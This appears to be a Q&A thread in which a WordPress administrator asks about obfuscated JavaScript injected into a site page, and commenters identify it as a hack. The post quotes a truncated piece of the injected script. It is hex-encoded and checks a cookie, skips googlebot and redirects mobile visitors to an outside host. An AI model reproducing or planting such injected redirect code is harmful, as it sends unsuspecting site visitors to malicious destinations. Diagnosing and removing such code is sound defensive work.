# weird javascript code appearing in wp page

Tags: javascript, wordpress

On a WP multisite some javascript code suddenly appeared in one of the pages. We don't think the client did this theirselves. When I google the code I find something very similar in a pastebin: `https://pastebin.com/rUn6KnKe`
it looks a bit like

```
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego
```

Also I can find some other sites who have some code like this:

http://pcsarmacardio.com/
http://ddreadymixconcrete.com/photos/

We can easily delete it since it is in the editor, but does anyone know why this happens and how to prevent it ?

Comment: it's javascript.

Comment: As you can see in the source code on both the the websites you link to, it says something about a Yoast SEO optimization plugin. Are you using that on your WP site? That probably generates this.

Comment: [Paste it in here and you'll see what the JS is.](http://jsbeautifier.org/).

Comment: They are unicode hex characters; [convert them to ASCII](http://www.rapidtables.com/convert/number/hex-to-ascii.htm). The first item in the array reads '_mauthtoken'.

Comment: The code you provided above is 'beautified' to: `if (document['cookie']['indexOf']('_mauthtoken') == -1) {
    (function(_0xecfdx1, _0xecfdx2) {
            if (_0xecfdx1['indexOf']('googlebot') == -1) {
                if (/(android|bb\d+|meego`. What is the actual code that is displayed within your pages? Can you provide a link to the site in question at all?

Comment: it is seem like some one has tried to hack your website..

Comment: @Jesper : Thanks for helping but we're not using yoast at out sites, so that can't be the cause

Comment: Ahh that doesn't sound good.. We're gonna take a look at the revisions now

Comment: Thanks for the suggestions everyone. We deleted all that code and we reduced the safetyrisks.

Comment: More details are explained here: https://blog.sucuri.net/2017/01/website-malware-targets-mobile-platforms.html

Answer (score 2, accepted):

This is the indication that your wordpress site has been tried for hacking.

Remove that virus and take the site lock and make your wordpress updated and do the clean coding for same.

Remove unwanted code. secure 404.php of theme. Have the proper redirection..

use wp_nonce_field if you are taking the data from users.